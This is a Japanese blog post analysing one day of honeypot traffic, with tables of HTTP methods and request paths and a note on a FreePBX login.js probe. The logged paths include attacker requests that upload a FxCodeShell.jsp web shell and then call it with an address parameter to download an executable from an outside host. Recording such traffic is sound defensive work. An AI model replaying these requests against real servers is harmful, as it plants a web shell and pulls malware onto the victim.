コンテンツへスキップ

セキュリティに関するあれこれ

honeypotの簡易分析19日目

2019-04-21 mah-nyan honeypot

2019-04-19のアクセス数は58件でした。

■送信元IPアドレスの数は 51件です。

■メソッドの一覧と件数は以下です。

method総数
GET52
HEAD1
POST2
PUT3
合計 結果58

■アクセスパス一覧と件数は以下です。

pathmethod総数
/ GET47
/admin/assets/js/views/login.jsGET1
/FxCodeShell.jsp::$DATAPUT1
/FxCodeShell.jsp?view=FxxkMyLie1836710Aa&os=1
&address=http://fid.hognoob.se/download.exe
GET1
/FxCodeShell.jsp/PUT1
/FxCodeShell.jsp%20PUT1
/promotions/GET2
/tmUnblock.cgiPOST2
http://110.249.212.46/testget?q=23333&port=80GET1
http://112.124.42.80:63435/HEAD1

気になるlog

-=-=15件目のlog=-=-

[2019-04-19 07:06:27+0900] 185.53.91.50 hoge:8080 "GET /admin/assets/js/views/login.js HTTP/1.1" 200 1001 
 GET /admin/assets/js/views/login.js HTTP/1.1
 Host: hoge:8080
 User-Agent: python-requests/2.21.0
 Accept-Encoding: gzip, deflate
 Accept: /
 Connection: keep-alive

FreePBXというIP電話のOSS設置の調査。

裏取るのが大変だったので、ソースコードのリンク載せておきます。

外人のコメントで”なんだこのlog?”ってのが多かったので、他の人の役に立てば幸いです。

ちなみに、FreePBX、以前は以下のURIで調査されていた。

//a2billing/customer/templates/default/footer.tpl

pythonのrequestを使うと標準では、UAにrequestのバージョンが入るみたい。スクレイピング対策として使えるかも!

/admin/assets/js/views/login.jshoneypot

投稿ナビゲーション

前の記事:honeypotの簡易分析18日目
次の記事:honeypotの簡易解析20日目

最近の投稿

  • CAPEv2の構築
  • 【お友達の解析】HawkEye Keylogger -2020/5/2

アーカイブ

  • 2020年9月
  • 2020年5月
  • 2020年4月
  • 2019年12月
  • 2019年11月
  • 2019年8月
  • 2019年5月
  • 2019年4月
  • 2019年1月
  • 2018年11月
  • 2018年9月
  • 2018年6月
  • 2018年1月
  • 2017年12月
  • 2017年9月
  • 2017年8月
  • 2017年7月

カテゴリー

  • CTF
  • hack
  • honeypot
  • others
  • Security Topics
  • お友達の特徴

RSS

2022年5月
月 火 水 木 金 土 日
 1
2345678
9101112131415
16171819202122
23242526272829
3031  
« 9月    
WordPress Theme: Tortuga by ThemeZee.